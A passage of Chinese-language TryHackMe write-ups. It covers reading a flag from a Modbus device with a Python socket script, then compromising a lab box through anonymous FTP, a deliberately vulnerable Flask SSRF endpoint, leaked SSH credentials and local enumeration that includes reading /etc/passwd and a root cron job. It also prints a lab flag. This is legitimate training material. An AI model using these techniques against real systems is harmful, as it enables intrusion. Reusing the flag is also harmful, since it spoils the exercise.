<p>在阅读了相关的文档后, 我发现该 app 的核心功能在于数据源的处理. 在这个页面我们找到了一个 secret 的数据源:
<img src="./sec.png" alt="secret" /></p>
<p>其<a href="https://sourceforge.net/p/scadabr/wiki/Manual%20ScadaBR%20English%204%20Chapter%204/">类型</a>为 <code>Modbus IP</code>, 即该数据源的获取遵循 modbus 协议
:::note
The Modbus IP data source is used to gather data from Modbus equipment accessible over an I/P network. Equipment can be in a local network or intranet, or could also be anywhere in the internet. This is a polling data source.
:::</p>
<p>一些信息:</p>
<ol>
<li>通信端口: <code>5020</code></li>
<li>slaveid: 1</li>
</ol>
<p>有趣的是, 其通信端口不是标准的 <code>502</code>, 而是 <code>5020</code>. 靶机的确开放了这个端口. NMAP 错误的识别了服务类别, 但结合上述信息, 有理由推测该协议为 modbus 协议</p>
<pre><code>nmap -p 5020 10.67.130.5
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-09-16 15:02 UTC
Nmap scan report for ip-10-67-130-5.ec2.internal (10.67.130.5)
Host is up (0.00041s latency).

PORT     STATE SERVICE
5020/tcp open  zenginkyo-1

Nmap done: 1 IP address (1 host up) scanned in 0.14 seconds
</code></pre>
<h2>dump from modbus device</h2>
<p>在翻找一圈后并没有找到多少有用的信息, 不过考虑到数据源是一个 modbus device, 尝试与 modbus device 交互.</p>
<p>对于一个 <a href="https://www.typhoon-hil.com/documentation/typhoon-hil-software-manual/References/modbus_device.html">modbus device</a>, 其根据 modbus 协议定义了四种寄存器, 每类里有多个寄存器:</p>
<p><img src="./modbbus-reg.png" alt="regs" /></p>
<p>从命名来看数据存储最有可能在 <code>Holding registers</code> 即存储寄存器中, 使用 Scadabar 的数据源复制功能读取其中信息并扔给 AI 翻译:
<img src="./dump-web.png" alt="web-dump" /></p>
<pre><code>THM{modbus_hid}
</code></pre>
<h1>beyond the flag</h1>
<p>即然 box 开放了 modbus 协议端口, 那也可以考虑直接通过原始协议与其交互. 我们的目的是完成对 <code>Holding registers</code> 的读取.</p>
<p><a href="https://en.wikipedia.org/wiki/Modbus#Modbus_messaging_on_TCP/IP">wiki</a> 上给出了 MAPH(MODBUS Application Protocol Header) 结构:</p>
<ol>
<li>Transaction Identifier: 客户端决定的 2 字节标识符</li>
<li>Protocol Identifier: <code>00 00</code></li>
<li>Length: PDU 和 Unit identifier 的 size</li>
<li>Unit identifier: 设备的标记, 也就是上文的 <code>1</code></li>
</ol>
<p>对于 PDU 则简单一些:</p>
<ol>
<li>Function code: 操作吗, 读取 <code>Holding registers</code> 为 <code>0x3</code></li>
<li>Data: 数据, 该上下文下即从哪个寄存器读多少个 <code>Holding register</code>(没有复数)</li>
</ol>
<p>:::caution
Modbus TCP 采用 big-Endian
:::</p>
<p>对于返回包, 其也遵循 7bit MAPH + PDU 的格式. 其中 PDU 的第一个字段为输出长度</p>
<pre><code>import struct
import socket

pdu = struct.pack("&gt;BHH", 0x3, 0, 20)
maph = struct.pack("&gt;HHHB", 1, 0x0, len(pdu)+1, 1)

host = '10.67.130.5'
port = 5020

frame = maph + pdu

with socket.create_connection((host, port)) as s:
    s.sendall(frame)
    resp = s.recv(124)

pdu = resp[7:]
datasz = pdu[1]
data = struct.unpack("&gt;"+"H"*(datasz//2), pdu[2:2+datasz])
for i in data:
    print(chr(i))
</code></pre>
]]></content>
    <author><name>0x5t4ckc47</name></author>
    <category term="THM-writeup"/>
  </entry>
  <entry>
    <title>OperationColdstart-thm</title>
    <link href="https://0x5t4ckc47.github.io/posts/operationcoldstart-thm/operationcoldstart/" rel="alternate" type="text/html"/>
    <id>https://0x5t4ckc47.github.io/posts/operationcoldstart-thm/operationcoldstart/</id>
    <published>2026-09-13T00:00:00.000Z</published>
    <updated>2026-09-13T00:00:00.000Z</updated>
    <summary>一周上六天学, 好累</summary>
    <content type="html"><![CDATA[<h1>recon</h1>
<p>:::info
Volt Labs, a small SaaS shop, suspects an old staging server has rotted into an exposed liability. Mara has assigned you the engagement. Find your way in and demonstrate full compromise.
:::</p>
<p>这应该是 operation 系列的第一台靶机, NMAP 结果如下:</p>
<pre><code>PORT   STATE SERVICE REASON         VERSION
21/tcp open  ftp     syn-ack ttl 64 vsftpd 3.0.5
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.64.97.72
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.5 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 ftp      ftp          4096 May 09 23:14 pub
22/tcp open  ssh     syn-ack ttl 64 OpenSSH 9.6p1 Ubuntu 3ubuntu13.16 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 50:3e:ff:e9:a7:26:38:1a:e1:f3:11:d3:bc:0a:f4:fb (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEUO7nRdm5U72vYPYT4ldCwwRm3HrS9SI2QDt0RDtxpjgtImELhfOc7fbsJdNPTUkP3uZ2UbxDfhaPVJUzrzVZA=
|   256 f1:59:51:7d:02:fe:b5:61:d7:19:0a:ab:0a:79:c1:a0 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIK40zkK0WFTd0R/4gjM3tX+33Ld8HgzxbHcR2+2e+jQR
80/tcp open  http    syn-ack ttl 64 gunicorn
|_http-server-header: gunicorn
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 NOT FOUND
|     Server: gunicorn
|     Date: Sun, 13 Sep 2026 01:37:56 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 207
|     &lt;!doctype html&gt;
|     &lt;html lang=en&gt;
|     &lt;title&gt;404 Not Found&lt;/title&gt;
|     &lt;h1&gt;Not Found&lt;/h1&gt;
|     &lt;p&gt;The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.&lt;/p&gt;
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Sun, 13 Sep 2026 01:37:51 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 2943
|     &lt;!DOCTYPE html&gt;
|     &lt;html lang="en"&gt;
|     &lt;head&gt;
|     &lt;meta charset="utf-8"&gt;
|     &lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;
|     &lt;title&gt;URL Preview - Volt Labs&lt;/title&gt;
|     &lt;style&gt;
|     :root{--primary:#0d6efd;--bg:#f6f8fa;--card:#fff;--text:#212529;--muted:#6c757d;--border:#dee2e6}
|     *{box-sizing:border-box}
|     body{margin:0;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,sans-serif;font-size:16px;line-height:1.5;color:var(--text);background:var(--bg)}
|     a{color:var(--primary);text-decoration:none}
|     a:hover{text-decoration:underline}
|     .navbar{background:#212529;color:#fff;padding:.75rem 1.5rem;display:flex;align-items:center;justify-content:space-between;box-shadow:0 1px 3px rgba(0,0,0,.08)}
|     .navbar .brand{font-w
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Sun, 13 Sep 2026 01:37:51 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Allow: GET, OPTIONS, HEAD
|     Content-Length: 0
|   RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Connection: close
|     Content-Type: text/html
|     Content-Length: 196
|     &lt;html&gt;
|     &lt;head&gt;
|     &lt;title&gt;Bad Request&lt;/title&gt;
|     &lt;/head&gt;
|     &lt;body&gt;
|     &lt;h1&gt;&lt;p&gt;Bad Request&lt;/p&gt;&lt;/h1&gt;
|     Invalid HTTP Version &amp;#x27;Invalid HTTP Version: &amp;#x27;RTSP/1.0&amp;#x27;&amp;#x27;
|     &lt;/body&gt;
|_    &lt;/html&gt;
|_http-title: URL Preview - Volt Labs
| http-methods: 
|_  Supported Methods: GET OPTIONS HEAD
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.94SVN%I=7%D=9/13%Time=6AA5FE6F%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,C1A,"HTTP/1\.0\x20200\x20OK\r\nServer:\x20gunicorn\r\nDate:\x
SF:20Sun,\x2013\x20Sep\x202026\x2001:37:51\x20GMT\r\nConnection:\x20close\
SF:r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x202
SF:943\r\n\r\n&lt;!DOCTYPE\x20html&gt;\n&lt;html\x20lang=\"en\"&gt;\n&lt;head&gt;\n&lt;meta\x20
SF:charset=\"utf-8\"&gt;\n&lt;meta\x20name=\"viewport\"\x20content=\"width=devic
SF:e-width,\x20initial-scale=1\"&gt;\n&lt;title&gt;URL\x20Preview\x20-\x20Volt\x20L
SF:abs&lt;/title&gt;\n&lt;style&gt;\n:root{--primary:#0d6efd;--bg:#f6f8fa;--card:#fff;
SF:--text:#212529;--muted:#6c757d;--border:#dee2e6}\n\*{box-sizing:border-
SF:box}\nbody{margin:0;font-family:-apple-system,BlinkMacSystemFont,\"Sego
SF:e\x20UI\",Roboto,\"Helvetica\x20Neue\",Arial,sans-serif;font-size:16px;
SF:line-height:1\.5;color:var\(--text\);background:var\(--bg\)}\na{color:v
SF:ar\(--primary\);text-decoration:none}\na:hover{text-decoration:underlin
SF:e}\n\.navbar{background:#212529;color:#fff;padding:\.75rem\x201\.5rem;d
SF:isplay:flex;align-items:center;justify-content:space-between;box-shadow
SF::0\x201px\x203px\x20rgba\(0,0,0,\.08\)}\n\.navbar\x20\.brand{font-w")%r
SF:(HTTPOptions,B3,"HTTP/1\.0\x20200\x20OK\r\nServer:\x20gunicorn\r\nDate:
SF:\x20Sun,\x2013\x20Sep\x202026\x2001:37:51\x20GMT\r\nConnection:\x20clos
SF:e\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nAllow:\x20GET,\x20
SF:OPTIONS,\x20HEAD\r\nContent-Length:\x200\r\n\r\n")%r(RTSPRequest,121,"H
SF:TTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\nContent-Ty
SF:pe:\x20text/html\r\nContent-Length:\x20196\r\n\r\n&lt;html&gt;\n\x20\x20&lt;head
SF:&gt;\n\x20\x20\x20\x20&lt;title&gt;Bad\x20Request&lt;/title&gt;\n\x20\x20&lt;/head&gt;\n\x20
SF:\x20&lt;body&gt;\n\x20\x20\x20\x20&lt;h1&gt;&lt;p&gt;Bad\x20Request&lt;/p&gt;&lt;/h1&gt;\n\x20\x20\x2
SF:0\x20Invalid\x20HTTP\x20Version\x20&amp;#x27;Invalid\x20HTTP\x20Version:\x2
SF:0&amp;#x27;RTSP/1\.0&amp;#x27;&amp;#x27;\n\x20\x20&lt;/body&gt;\n&lt;/html&gt;\n")%r(FourOhFour
SF:Request,170,"HTTP/1\.0\x20404\x20NOT\x20FOUND\r\nServer:\x20gunicorn\r\
SF:nDate:\x20Sun,\x2013\x20Sep\x202026\x2001:37:56\x20GMT\r\nConnection:\x
SF:20close\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Leng
SF:th:\x20207\r\n\r\n&lt;!doctype\x20html&gt;\n&lt;html\x20lang=en&gt;\n&lt;title&gt;404\x20
SF:Not\x20Found&lt;/title&gt;\n&lt;h1&gt;Not\x20Found&lt;/h1&gt;\n&lt;p&gt;The\x20requested\x20URL
SF:\x20was\x20not\x20found\x20on\x20the\x20server\.\x20If\x20you\x20entere
SF:d\x20the\x20URL\x20manually\x20please\x20check\x20your\x20spelling\x20a
SF:nd\x20try\x20again\.&lt;/p&gt;\n");
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
</code></pre>
<p>开放 <code>21</code>,<code>22</code>,<code>80</code> 三个端口. TTL 均为 64, 与 Linux 一跳后预期吻合.</p>
<h2>ftp</h2>
<p>尝试 anonymous 登陆:</p>
<pre><code>root@ip-10-64-97-72:~# ftp 10.64.188.6
Connected to 10.64.188.6.
220 (vsFTPd 3.0.5)
Name (10.64.188.6:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp&gt; ls
229 Entering Extended Passive Mode (|||40015|)
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 May 09 23:14 pub
226 Directory send OK.
ftp&gt; cd pub
250 Directory successfully changed.
ftp&gt; ls
229 Entering Extended Passive Mode (|||40058|)
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp          2446 May 09 23:14 backup.tar.gz
226 Directory send OK.
ftp&gt; get backup.tar.gz
local: backup.tar.gz remote: backup.tar.gz
229 Entering Extended Passive Mode (|||40040|)
150 Opening BINARY mode data connection for backup.tar.gz (2446 bytes).
100% |**********************************************************************************************************************************************************************************|  2446       15.34 MiB/s    00:00 ETA
226 Transfer complete.
2446 bytes received in 00:00 (4.02 MiB/s)
ftp&gt; 
</code></pre>
<p>有一个压缩包, 没有密码, 打开后是预览版本的网页源代码</p>
<pre><code>root@ip-10-64-97-72:~/wrk# tar -xzf ./backup.tar.gz 
root@ip-10-64-97-72:~/wrk# ls
backup.tar.gz  svc  voltlabs-preview
root@ip-10-64-97-72:~/wrk# cd voltlabs-preview/
root@ip-10-64-97-72:~/wrk/voltlabs-preview# ls
README.md  app.py  requirements.txt
</code></pre>
<h1>Web</h1>
<p>很精简的 web 页面, 一个 url 预览功能:
<img src="./web-urlpreview.png" alt="urlpreview" /></p>
<p>目录爆破:</p>
<pre><code>root@ip-10-64-97-72:~# dirserach -u dirsearch -u 10.64.188.6 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-small-words.txt -o ./url

  _|. _ _  _  _  _ _|_    v0.4.3.post1
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 43003

Output File: ./url

Target: http://10.64.188.6/

[01:53:02] Starting: 
[01:53:02] 308 -  237B  - /admin  -&gt;  http://10.64.188.6/admin/
[01:53:06] 400 -    2KB - /preview
</code></pre>
<p>共两个路由:</p>
<ol>
<li><code>/admin</code>: 管理界面, 但无权访问</li>
<li><code>/preview</code>: 图片中的 preview 功能</li>
</ol>
<h2>techstack</h2>
<pre><code>HTTP/1.0 200 OK
Server: gunicorn
Date: Sun, 13 Sep 2026 01:37:51 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 2943
</code></pre>
<p>Server 显示 gunicorn, 其是一个 python 的 HTTP Server, 即目标 Web 环境为 Python
::github{repo="benoitc/gunicorn"}</p>
<p>gunicorn 具有反代功能, 但没有在当前页面上体现出来</p>
<h2>code analyse</h2>
<p>:::code-tree{title="codeleak" height="380px" entry="src/Button.svelte"}</p>
<pre><code># Volt Labs URL Preview

Internal staging tool. Run with `gunicorn -b 0.0.0.0:80 app:app`.

Admin routes are gated by source-IP check (localhost only).
</code></pre>
<pre><code>from flask import Flask, request, abort
from urllib.parse import urlparse
import html
import requests

app = Flask(__name__)

# Only requests targeting an approved internal hostname are forwarded.
# Internal hostname resolves to 127.0.0.1 via /etc/hosts on this box.
ALLOWED_HOSTS = {"kestrel.thm"}

CSS = """
&lt;style&gt;
:root{--primary:#0d6efd;--bg:#f6f8fa;--card:#fff;--text:#212529;--muted:#6c757d;--border:#dee2e6}
*{box-sizing:border-box}
body{margin:0;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,sans-serif;font-size:16px;line-height:1.5;color:var(--text);background:var(--bg)}
a{color:var(--primary);text-decoration:none}
a:hover{text-decoration:underline}
.navbar{background:#212529;color:#fff;padding:.75rem 1.5rem;display:flex;align-items:center;justify-content:space-between;box-shadow:0 1px 3px rgba(0,0,0,.08)}
.navbar .brand{font-weight:600;font-size:1.125rem;letter-spacing:.2px}
.navbar .muted-light{color:#a5acb3;font-size:.95rem}
.container{max-width:960px;margin:2rem auto;padding:0 1rem}
.card{background:var(--card);border:1px solid var(--border);border-radius:.5rem;padding:1.5rem;margin-bottom:1.25rem;box-shadow:0 1px 2px rgba(0,0,0,.04)}
h1{font-size:1.75rem;margin:0 0 .75rem}
h2{font-size:1.25rem;margin:1.25rem 0 .5rem}
.muted{color:var(--muted);font-size:.95rem}
.form-group{margin-bottom:1rem}
label{display:block;margin-bottom:.25rem;font-weight:500;font-size:.95rem}
.form-control{display:block;width:100%;padding:.5rem .75rem;font-size:1rem;line-height:1.5;color:var(--text);background:#fff;border:1px solid var(--border);border-radius:.375rem;transition:border-color .15s,box-shadow .15s}
.form-control:focus{outline:0;border-color:#86b7fe;box-shadow:0 0 0 .2rem rgba(13,110,253,.25)}
.btn{display:inline-block;padding:.5rem 1rem;font-size:1rem;font-weight:500;border:1px solid transparent;border-radius:.375rem;cursor:pointer;transition:background .15s}
.btn-primary{background:var(--primary);color:#fff}
.btn-primary:hover{background:#0b5ed7}
pre{background:#f1f3f5;border:1px solid var(--border);border-radius:.375rem;padding:.75rem;overflow:auto;font-size:.9rem;white-space:pre-wrap;word-break:break-word}
footer.site{text-align:center;color:var(--muted);margin:2rem 0;font-size:.875rem}
&lt;/style&gt;
"""

def page(title, body):
    return f"""&lt;!DOCTYPE html&gt;
&lt;html lang="en"&gt;
&lt;head&gt;
&lt;meta charset="utf-8"&gt;
&lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;
&lt;title&gt;{title} - Volt Labs&lt;/title&gt;{CSS}&lt;/head&gt;
&lt;body&gt;
&lt;nav class="navbar"&gt;
    &lt;span class="brand"&gt;Volt Labs&lt;/span&gt;
    &lt;span class="muted-light"&gt;URL Preview Service &amp;middot; staging&lt;/span&gt;
&lt;/nav&gt;
&lt;main class="container"&gt;{body}&lt;/main&gt;
&lt;footer class="site"&gt;&amp;copy; Volt Labs &amp;middot; do not expose externally&lt;/footer&gt;
&lt;/body&gt;
&lt;/html&gt;"""

@app.route("/")
def index():
    body = """
    &lt;div class="card"&gt;
        &lt;h1&gt;URL Preview Service&lt;/h1&gt;
        &lt;p class="muted"&gt;Internal tool. Paste a URL below to preview its contents.&lt;/p&gt;
        &lt;form method="get" action="/preview"&gt;
            &lt;div class="form-group"&gt;
                &lt;label for="url"&gt;URL&lt;/label&gt;
                &lt;input id="url" type="text" name="url" class="form-control" placeholder="https://example.com/" required&gt;
            &lt;/div&gt;
            &lt;button type="submit" class="btn btn-primary"&gt;Preview&lt;/button&gt;
        &lt;/form&gt;
    &lt;/div&gt;
    """
    return page("URL Preview", body)

@app.route("/preview")
def preview():
    target = request.args.get("url", "")
    if not target:
        return page("Preview Error",
                    '&lt;div class="card"&gt;&lt;p&gt;Provide a &lt;code&gt;?url=&lt;/code&gt; parameter.&lt;/p&gt;&lt;/div&gt;'), 400

    # VULN: hostname allow-list is the only check. No scheme check, no path check,
    # no localhost-rebind protection - the SSRF is still abusable, but only
    # against the allowed hostname.
    host = (urlparse(target).hostname or "").lower()
    if host not in ALLOWED_HOSTS:
        return page("Preview Blocked",
                    '&lt;div class="card"&gt;&lt;p&gt;Host not in the approved internal allow-list.&lt;/p&gt;&lt;/div&gt;'), 403

    try:
        r = requests.get(target, timeout=3)
        safe_target = html.escape(target)
        safe_body = r.text.replace("&lt;", "&amp;lt;")
        body = f"""
        &lt;div class="card"&gt;
            &lt;h2&gt;Preview of {safe_target}&lt;/h2&gt;
            &lt;pre&gt;{safe_body}&lt;/pre&gt;
        &lt;/div&gt;
        """
        return page("Preview", body)
    except Exception as e:
        safe_err = html.escape(str(e))
        return page("Preview Failed",
                    f'&lt;div class="card"&gt;&lt;p&gt;Fetch failed: {safe_err}&lt;/p&gt;&lt;/div&gt;'), 502

@app.route("/admin/")
@app.route("/admin/&lt;path:p&gt;")
def admin(p="index"):
    if not request.remote_addr.startswith("127."):
        abort(403)
    if p == "notes":
        with open("/opt/voltlabs-preview/admin_notes.txt") as f:
            return "&lt;pre&gt;" + f.read() + "&lt;/pre&gt;"
    return "&lt;pre&gt;Volt Labs admin endpoint.&lt;/pre&gt;"

if __name__ == "__main__":
    app.run(host="0.0.0.0", port=80)
</code></pre>
<pre><code>flask
requests
gunicorn
</code></pre>
<p>:::</p>
<h3><code>/preview</code></h3>
<p>接受一个 <code>url</code> 参数, 通过 <code>requests.get(target, timeout=3)</code> 访问并获取, 仅容许访问 <code>kestrel.thm</code>, 但其会被解析为 <code>127.0.0.1</code></p>
<h3><code>/admin</code></h3>
<p>仅容许 <code>127.*</code> 访问, 如果参数为 <code>notes</code>, 那打开 <code>/opt/voltlabs-preview/admin_notes.txt</code> 文件并给出内容</p>
<h2>SSRF on <code>/preview</code></h2>
<p><img src="./ssrf-adm-notes.png" alt="ssrf" />
得到笔记内容:</p>
<pre><code>&lt;pre&gt;=== INTERNAL ===
SSH access for staging:
  user: webdev
  pass: V0ltLabs#summer
- Mara
&lt;/pre&gt;
</code></pre>
<p>一组凭据: <code>webdev</code>: <code>V0ltLabs#summer</code></p>
<h1>shell as webdev</h1>
<p>ssh 要求提供密码的页面有些奇怪:</p>
<pre><code>root@ip-10-64-97-72:~# ssh webdev@10.64.188.6
(webdev@10.64.188.6) Password:
Welcome to Ubuntu 24.04.4 LTS (GNU/Linux 6.17.0-1015-aws x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Sun Sep 13 02:13:52 UTC 2026

  System load:  0.0               Temperature:           -273.1 C
  Usage of /:   9.3% of 38.70GB   Processes:             113
  Memory usage: 17%               Users logged in:       0
  Swap usage:   0%                IPv4 address for ens5: 10.64.188.6

 * Ubuntu Pro delivers the most comprehensive open source security and
   compliance features.

   https://ubuntu.com/aws/pro

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

1 additional security update can be applied with ESM Apps.
Learn more about enabling ESM Apps service at https://ubuntu.com/esm


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

webdev@coldstart:~$ 
</code></pre>
<p>当连续三次输错密码后, ssh 会给出另一个密码输入提示而不是断开连接:</p>
<pre><code>(webdav@10.64.188.6) Password: 
(webdav@10.64.188.6) Password: 
(webdav@10.64.188.6) Password: 
webdav@10.64.188.6's password: 
Permission denied, please try again.
webdav@10.64.188.6's password: 
Permission denied, please try again.
webdav@10.64.188.6's password:'
</code></pre>
<h2>enum</h2>
<p>如果只是怼到一起有些乱
:::steps[enum]</p>
<ol>
<li>
<p><strong>webdevs priv and env</strong>
用户的权限情况</p>
<pre><code>webdev@coldstart:~$ id
uid=1001(webdev) gid=1001(webdev) groups=1001(webdev)
webdev@coldstart:~$ groups
webdev
webdev@coldstart:~$ env
SHELL=/bin/bash
PWD=/home/webdev
LOGNAME=webdev
XDG_SESSION_TYPE=tty
HOME=/home/webdev
LANG=C.UTF-8
LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=00:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.avif=01;35:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.webp=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:*~=00;90:*#=00;90:*.bak=00;90:*.crdownload=00;90:*.dpkg-dist=00;90:*.dpkg-new=00;90:*.dpkg-old=00;90:*.dpkg-tmp=00;90:*.old=00;90:*.orig=00;90:*.part=00;90:*.rej=00;90:*.rpmnew=00;90:*.rpmorig=00;90:*.rpmsave=00;90:*.swp=00;90:*.tmp=00;90:*.ucf-dist=00;90:*.ucf-new=00;90:*.ucf-old=00;90:
SSH_CONNECTION=10.64.97.72 40908 10.64.188.6 22
LESSCLOSE=/usr/bin/lesspipe %s %s
XDG_SESSION_CLASS=user
TERM=xterm-256color
LESSOPEN=| /usr/bin/lesspipe %s
USER=webdev
SHLVL=1
XDG_SESSION_ID=46
XDG_RUNTIME_DIR=/run/user/1001
SSH_CLIENT=10.64.97.72 40908 22
XDG_DATA_DIRS=/usr/local/share:/usr/share:/var/lib/snapd/desktop
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1001/bus
SSH_TTY=/dev/pts/0
_=/usr/bin/env
</code></pre>
<p><em>sudo</em>: 没有 sudo 权限</p>
<pre><code>webdev@coldstart:~$ sudo -l
[sudo] password for webdev: 
Sorry, user webdev may not run sudo on coldstart.
</code></pre>
<p><em>writeable</em>:</p>
<pre><code>webdev@coldstart:~$ find / -writable -ls 2&gt;/dev/null|grep -v home|grep -v proc|grep -v snap|grep dev|grep -v sys|grep -v '/dev'|grep -v run
524667      4 drwxrwx---   2 webdev           webdev               4096 May  9 23:14 /opt/backups
524668      4 -rw-r--r--   1 webdev           webdev                 12 May  9 23:14 /opt/backups/.keep
</code></pre>
</li>
<li>
<p><strong>machine info</strong>
<em>Users</em>:</p>
<pre><code>webdev@coldstart:~$ cat /etc/passwd|grep 'sh$'
root:x:0:0:root:/root:/bin/bash
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
webdev:x:1001:1001::/home/webdev:/bin/bash
</code></pre>
<p>除去 webdev 还有一个有 bash 设置的非 root 用户</p>
<p><em>conrtab</em></p>
<pre><code>webdev@coldstart:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
# You can also override PATH, but by default, newer versions inherit it from the environment
#PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *	* * *	root	cd / &amp;&amp; run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || { cd / &amp;&amp; run-parts --report /etc/cron.daily; }
47 6	* * 7	root	test -x /usr/sbin/anacron || { cd / &amp;&amp; run-parts --report /etc/cron.weekly; }
52 6	1 * *	root	test -x /usr/sbin/anacron || { cd / &amp;&amp; run-parts --report /etc/cron.monthly; }
#
webdev@coldstart:~$ ls /etc/cron*
/etc/crontab
/etc/cron.d:
e2scrub_all  sysstat  voltlabs-backup
/etc/cron.daily:
apport  apt-compat  bsdmainutils.dpkg-remove  dpkg  logrotate  man-db  sysstat
/etc/cron.hourly:
/etc/cron.monthly:
/etc/cron.weekly:
man-db
/etc/cron.yearly:
</code></pre>
<p>有一个有趣的计划任务: <code>voltlabs-backup</code>, 以 root 权限每分钟执行的计划任务</p>
<pre><code>webdev@coldstart:~$ cat  /etc/cron.d/voltlabs-backup 
# Volt Labs staging backup - runs as root
SHELL=/bin/bash
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

* * * * * root cd /opt/backups &amp;&amp; tar czf /var/backups/uploads.tgz *
</code></pre>
<p><em>Service-Timer</em>: 没啥有趣的</p>
<pre><code>webdev@coldstart:~$ systemctl list-timers
NEXT                            LEFT LAST                             PASSED UNIT                           ACTIVATES                       
Sun 2026-09-13 02:51:44 UTC    13min Wed 2026-05-20 09:47:01 UTC           - fstrim.timer                   fstrim.service
